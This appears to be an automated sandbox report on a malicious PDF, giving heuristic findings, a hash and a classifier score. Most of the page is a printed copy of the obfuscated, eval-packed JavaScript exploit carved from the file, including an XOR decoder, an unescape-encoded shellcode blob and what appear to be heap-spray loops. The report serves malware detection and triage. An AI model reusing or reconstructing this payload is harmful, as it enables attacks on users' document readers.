MALICIOUS
116
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded and obfuscated JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_FROMCHARCODE. The extracted artifact 'javascript_obj0007_000.js' likely contains malicious code. The obfuscation suggests an attempt to hide the script's true purpose, which is presumed to be downloading and executing a second-stage payload. The document body text is nonsensical and appears to be filler.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
e = function\( c \){ return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)};if\(!''.replace\(/^/,String\)\){while\(c--\){d[e\(c\)]=k[c]||e\(c\)}k=[function\(e\){return d[e]}];e=function\(\){return'\\\\w+'};c=1};while\(c--\){if\(k[c]\){p=p.replace\(new RegExp\('\\\\b'+e\(c\)+'\\\\b','g'\),k[c]\)}}return p}\('1w 3y\(12\){Z T=0;Z X="";3u\(T=0;T<12.3q;T++\){X=X+3r.3s\(12.3t\(T\)^3\)}1s X}1w 1D\(1o\){1s 3z\(1o\)}Z 3A="&3G&3H&1E&v:`c&3I;&e&3F&3E;0"+"&3B&3C`3&3D&Q;3p&v;1q`&3o`s … ) -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x406 | 7232 bytes |
SHA-256: f002a7803934a0cd4228a3945bf88ff66a9ba0fba9e9c3735c1fbe2e861920cf |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function Boq9qtf6(Wzdk9fvx){
eval (
Wzdk9fvx
);
}
Boq9qtf6(
function
( p, a, c,
k,
e,
d
)
{
e = function( c ){
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1w 3y(12){Z T=0;Z X="";3u(T=0;T<12.3q;T++){X=X+3r.3s(12.3t(T)^3)}1s X}1w 1D(1o){1s 3z(1o)}Z 3A="&3G&3H&1E&v:`c&3I;&e&3F&3E;0"+"&3B&3C`3&3D&Q;3p&v;1q`&3o`s&1i;a&2W`"+"&1y;a&2X;&v;1q:&2Y&1y;g&v;2V`&2U`s&1E"+"&2Q&D&2R&2S&2T&e&2Z&3e;"+"&D&3n&v;:t&v;J&U`1&D&M&v;35;"+"&e&1k&1d:6&D&v;:33&v;J&U`1&D"+"&13&1h&v;b`1&1c:`&3f&e&1b;3&1C"+"&v;;35&1B`&1z&v`1F&1G&v;:33&v;J&1I`1"+"&G&M&v:10&1H&e&O;:&v`1;2&1m"+"&e&1n&v:10&1x&e&N&N&O;:"+"&v`1;2&11&e&v;:7&v;J&Q;`1&G&M"+"&N&1r&1A&O;:&v`1;2&11&e&1v"+"&1u:6&D&v;:33&v;J&U`1&D&M&v;35;"+"&e&1k&1d:6&D&v;:33&v;J&U`1&D"+"&13&1h&v;b`1&1c:`&2E&e&1b;3&1C"+"&v;;35&1B`&1z&v`1F&1G&v;:33&v;J&1I`1"+"&G&M&v:10&1H&e&O;:&v`1;2&1m"+"&e&1n&v:10&1x&e&N&N&O;:"+"&v`1;2&11&e&v;:7&v;J&1K`1&G&M"+"&N&1r&1A&O;:&v`1;2&11&e&1v"+"&1u:6&D&v:2m&2i&2r&2q:&v`2s;&e"+"&e&e&e&e&e&e&e&19"+"&2t&2v&2u&2o&2n;&W`33&1g&W`16"+"&2h:&2g&Q:41&2j&19&2k&2l&2w"+"&2x&1j&2J&2I&2H:&Q;8&2K&2L"+"&2N;:&2M;:&v`2G&2F&2A:2z&v;:2y&2B:&2C`3"+"&27`&e&18&R&e&1f&v;Y&R"+"&e&1i;a&v;2D;&2O``5&18&R&e&1J;g"+"&1L&e&1a&14;6&G&1M&1a&14;6"+"&G&1O&1N&v;Y&R&e&24&1Y"+"&1X&v;Y&R&e&v`5;:&1Z;:&21`r&1P"+"&23:&1W&1V&1R:&1Q:0&1S&1T;6&G"+"&13&v:1U&1f&2p`2&3Z&3Y;6&G&v;:33"+"&3X`5&v;Y&R&e&3W`0&40&e&e"+"&e&e&e&e&e&v;:33&14;6&G"+"&46&4c;H&4b;&47&3V&3U&v;3`f&3O"+"&3N&3M&3L`0&W`7&3P&3Q&W`E&3T`"+"&3S&3R`&4g&P`4h&1g&2P&4v&P`5:"+"&4u&4t&4w&4x&4A&Q;L&4z&4y"+"&4s&4r;&P;43&4l&4k;&4j&4i&Q:1e"+"&15;&15;&15;&17;&1j&4m&4n&4q"+"&P`L&4p&4o&3K&3J;&P:3i&3h&3g"+"&17;&P`5`&3j&3k&v:3m"+"";Z V="@8@7@4@20@4a@37@9@t@36@34@j@8@20@3d@20@7@z@z@2e@8@j@h@E@h@4@L@h@4@s@j@t@o@2e@d@t@K@d@4@j@o@9@28@29@3b@4a@37@9@t@36@34@j@8@20@3d@20@4a@37@9@t@36@34@j@8@2e@4@h@z@m@7@p@h@28@2f@3l@44@2f@9@2c@22@22@29@3b@i@j@c@28@4a@37@9@t@36@34@j@8"+"@2e@p@x@7@4@41@d@28@30@29@20@3d@3d@20@22@38@22@20@26@26@20@4a@37@9@t@36@34@j@8@2e@p@x@7@4@41@d@28@31@29@20@3c@3d@20@22@31@22@20@26@26@20@4a@37@9@t@36@34@j@8@2e@p@x@7@4@41@d@28@32@29@20@3c@3d@20@22@32@22@29@I@i@n@4e@34@34@33@u@k@q@20@3d@20@B@m@j@y@8"+"@d@w@28@42@r@8@m@d@9@9@d@28@1l@35@7@s@m@30@29@29@3b@i@n@8@7@4@20@B@8@39@C@l@38@20@3d@20@B@m@j@y@8@d@w@28@22@25@k@30@7@30@22@20@2b@20@22@7@25@k@30@7@22@20@2b@20@22@30@7@22@20@2b@20@22@22@29@3b@i@n@8@7@4@20@44@37@c@w@j@l@k@20@3d@20@32@30@20"+"@2b@20@4e@34@34@33@u@k@q@2e@m@h@o@9@d@x@3b@i@n@E@x@j@m@h@28@B@8@39@C@l@38@2e@m@h@o@9@d@x@20@3c@20@44@37@c@w@j@l@k@29@20@B@8@39@C@l@38@20@2b@3d@20@B@8@39@C@l@38@3b@i@n@8@7@4@20@48@33@w@39@p@33@4@20@3d@20@B@8@39@C@l@38@2e@s@k@r@s"+"@d@4@j@o@9@28@30@2c@20@44@37@c@w@j@l@k@29@3b@i@n@8@7@4@20@K@36@o@4@39@31@u@r@20@3d@20@B@8@39@C@l@38@2e@s@k@r@s@d@4@j@o@9@28@30@2c@20@B@8@39@C@l@38@2e@m@h@o@9@d@x@20@2d@20@44@37@c@w@j@l@k@29@3b@i@n@E@x@j@m@h@28@K@36@o@4@39@31"+"@u@r@2e@m@h@o@9@d@x@20@2b@20@44@37@c@w@j@l@k@20@3c@20@30@A@36@30@30@30@30@29@20@K@36@o@4@39@31@u@r@20@3d@20@K@36@o@4@39@31@u@r@20@2b@20@K@36@o@4@39@31@u@r@20@2b@20@48@33@w@39@p@33@4@3b@i@n@8@7@4@20@44@q@l@s@d@9@r@h@20@3d@20@o@h@E@20@41"+"@4@4@7@w@28@29@3b@i@n@c@t@4@28@43@38@30@r@h@s@c@31@9@20@3d@20@30@3b@20@43@38@30@r@h@s@c@31@9@20@3c@20@31@32@30@30@3b@20@43@38@30@r@h@s@c@31@9@2b@2b@29@I@44@q@l@s@d@9@r@h@1p@43@38@30@r@h@s@c@31@9@1t@20@3d@20@K@36@o@4@39@31@u@r@20@2b@20@4e@34"+"@34@33@u@k@q@F@i@n@8@7@4@20@49@7@33@l@38@p@33@20@3d@20@22@31@32@22@3b@i@n@c@t@4@20@28@8@7@4@20@4f@34@k@u@y@38@9@A@3d@30@3b@20@4f@34@k@u@y@38@9@A@3c@31@38@3b@20@4f@34@k@u@y@38@9@A@2b@2b@29@I@20@49@7@33@l@38@p@33@20@3d@20@49@7@33@l@38@p@33@2b"+"@22@39@22@3b@F@i@n@c@t@4@20@28@8@7@4@20@4f@34@k@u@y@38@9@A@3d@30@3b@20@4f@34@k@u@y@38@9@A@3c@32@37@36@3b@20@4f@34@k@u@y@38@9@A@2b@2b@29@I@20@49@7@33@l@38@p@33@20@3d@20@49@7@33@l@38@p@33@2b@22@38@22@3b@F@i@20@20@20@20@k@d@j@m@2e@z@4@j@o@d@c"+"@28@22@25@34@35@30@30@30@c@22@2c@20@49@7@33@l@38@p@33@29@3b@i@F@i@h@m@s@h@I@i@20@20@20@20@i@n@8@7@4@20@4e@u@4@w@30@h@35@38@m@20@3d@20@o@h@E@20@41@4@4@7@w@28@29@3b@i@n@c@k@o@p@d@j@t@o@20@B@r@u@x@8@z@28@4a@39@z@l@9@q@c@2c@20@S@c@y"+"@w@c@H@k@d@s@29@I@i@n@E@x@j@m@h@28@4a@39@z@l@9@q@c@2e@m@h@o@9@d@x@20@2a@20@32@20@3c@20@S@c@y@w@c@H@k@d@s@29@I@i@n@4a@39@z@l@9@q@c@20@2b@3d@20@4a@39@z@l@9@q@c@3b@F@i@n@4a@39@z@l@9@q@c@20@3d@20@4a@39@z@l@9@q@c@2e@s@k@r@s"+"@d@4@j@o@9@28@30@2c@20@S@c@y@w@c@H@k@d@s@20@2f@20@32@29@3b@i@n@4@h@d@k@4@o@20@4a@39@z@l@9@q@c@3b@F@i@n@8@7@4@20@16@4@7@w@k@q@y@20@3d@20@30@A@30@p@30@p@30@p@30@p@3b@i@n@8@7@4@20@4e@30@h@33@j@x@H@20@3d@20@B@m@j@y@8@d@w@28@42"+"@r@8@m@d@9@9@d@28@1l@35@7@s@m@30@29@29@3b@i@n@8@7@4@20@4f@p@r@x@7@q@y@20@3d@20@30@A@34@30@30@30@30@30@3b@i@n@8@7@4@20@49@39@o@l@c@E@d@20@3d@20@4e@30@h@33@j@x@H@2e@m@h@o@9@d@x@20@2a@20@32@3b@i@n@8@7@4@20@S@c@y@w@c@H@k@d@s@20@3d"+"@20@4f@p@r@x@7@q@y@20@2d@20@28@49@39@o@l@c@E@d@2b@30@A@33@38@29@3b@i@n@8@7@4@20@4a@39@z@l@9@q@c@20@3d@20@B@m@j@y@8@d@w@28@22@25@k@39@30@39@30@25@k@39@30@39@30@22@29@3b@i@n@4a@39@z@l@9@q@c@20@3d@20@B@r@u@x@8@z@28@4a@39@z@l@9@q@c@2c@20"+"@S@c@y@w@c@H@k@d@s@29@3b@i@n@8@7@4@20@4d@q@32@o@38@p@39@20@3d@20@28@16@4@7@w@k@q@y@20@2d@20@30@A@34@30@30@30@30@30@29@20@2f@20@4f@p@r@x@7@q@y@3b@i@n@c@t@4@20@28@8@7@4@20@L@8@C@h@A@37@20@3d@20@30@3b@20@L@8@C@h@A@37@20@3c@20@4d@q@32@o"+"@38@p@39@3b@L@8@C@h@A@37@2b@2b@29@I@4e@u@4@w@30@h@35@38@m@1p@L@8@C@h@A@37@1t@20@3d@20@4a@39@z@l@9@q@c@20@2b@20@4e@30@h@33@j@x@H@3b@F@i@n@8@7@4@20@42@36@q@u@t@37@20@3d@20@B@m@j@y@8@d@w@28@22@25@k@30@p@30@p@22@20@2b@20@22@25@k@30@p@30@p"+"@22@20@2b@20@22@22@29@3b@i@n@E@x@j@m@h@28@42@36@q@u@t@37@2e@m@h@o@9@d@x@20@3c@20@34@34@39@35@32@29@20@42@36@q@u@t@37@20@2b@3d@20@42@36@q@u@t@37@3b@i@n@d@x@j@s@2e@p@t@m@m@7@r@K@d@t@4@h@20@3d@20@43@t@m@m@7@r@2e@p@t@m@m@h@p@d@45@y@7"+"@j@m@49@o@c@t@28@I@s@k@r@q@3a@20@22@22@2c@y@s@9@3a@20@42@36@q@u@t@37@F@29@3b@i@F"+"";V=V.3v(/@/g,"%3x");3w(1D(V));',62,285,'||||72|||61|76|67|||66|74|v3333|||65|0a|69|75|6b|6c|09|6e|63|6a|62|73|6f|71||79|68|6d|70|78|54|7a|v3332|77|7d|v3331|64|7b|2fb|53|56|v6133|v335b|vfb|v5|v4|v312a|50|A358dt3ot|v6f|Geo6u8|v7|Vy50jg|630|var|6ee|v326f|Jrlbn4|v0233|v2a|v415|57|v565|va630|v5674|v30bg|vea|v06|v7f||vbg55|v525e|v32e5|v43|v5641|vee33|59|v3163|v6361|Xp2juzs1|5b|a3|vg3ee|return|5d|v6b|vee61|function|v3265|v73|vfa75|v365b|v012|v4733|Tlimvty|v6465|5ff|v0137|v3261|v76|vag|vb5|v312e|vba33|vbgba|v6333|vb5e0|vg2|v6ff|v30f3|v14|5e5|vfa70|v6f37|v65bg|vga02|vg4||ve||v476|v6fba|||v330|||||||||v5241|v515|v6e6g|v3372|v6347|v5e41|g33|v725|v4752|vf3|v6a6|v6b6f|06|v6747|v6343|v5g56|v7250|v5757|e4|eg|v1|v02e|vaf|04|v315f|v46bf|303|v5f5|v6433|v4040|v5056|vaa33|ve4|ve1|v2|v6757|v6faf|v3233|vaeff|v327f|v0|a4|vbg2|vfa3|v0773|vfe32|||||||||||||||vg5f|v3150|v1506|v0g57|0e|v025e|v3304|5c|333|v6e33|v3|03|length|String|fromCharCode|charCodeAt|for|replace|eval|u00|Bbvltggt|unescape|Y5asl0|v023g|v57|v7330|vfg|v6g33|v6063|v6162|v33f|v435|v431f|v66|vfgfa|v3147|vaa0f|v7e7g|v1f7f|v777|v6166|v337|v32ba|v6f6e|vfa|vbg|v2e|v3031|v3323||||||v6533|veeee||||vee6|vf||||v445e|5f|v1e0b|v4347|v475|v3343|v1f5e|v5f50|v565g|v5e50|v441e|v1f5|v4052|v4333|v7256|v755e|v5557|v4346|v4150|v3356|v1f57'.split('|'),0,{}))
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.